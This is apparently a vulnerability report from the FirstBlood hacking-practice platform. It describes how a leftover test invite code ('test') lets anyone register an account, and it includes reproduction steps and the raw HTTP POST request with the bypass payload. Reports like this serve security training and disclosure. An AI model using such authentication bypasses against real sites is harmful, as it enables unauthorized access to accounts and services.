FirstBlood-#377Unique invite code bypass
This issue was discovered on FirstBlood v2



On 2021-10-25, vigilante Level 4 reported:

Description

It is possible to create a new account with the test/test credentials instead of using a unique invite code.

Steps to reproduce

  1. Navigate to services > Doctor login https://87357338e250-vigilante.a.firstbloodhackers.com/login.php
  2. Click on the register here url https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
  3. Use username:test and unique invite code:test, click on "Secure register".
  4. You'll will get a message that you've successfully created an account.

Success! Your account has been created with the following credentials:

Username: test Password: Kpu2K8iIta

POST /register.php HTTP/1.1
Host: 87357338e250-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://87357338e250-vigilante.a.firstbloodhackers.com
Referer: https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
Te: trailers
Connection: close

action=register&username=test&inviteCode=test

Screenshot:

Impact:

It is possible to bypass the unique code requirement, it looks like some test credentials made it to production and we can use the word "test" when creating new accounts.

P3 Medium

Endpoint: /register.php

Parameter: inviteCode=

Payload: test


FirstBlood ID: 24
Vulnerability Type: Auth issues

The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.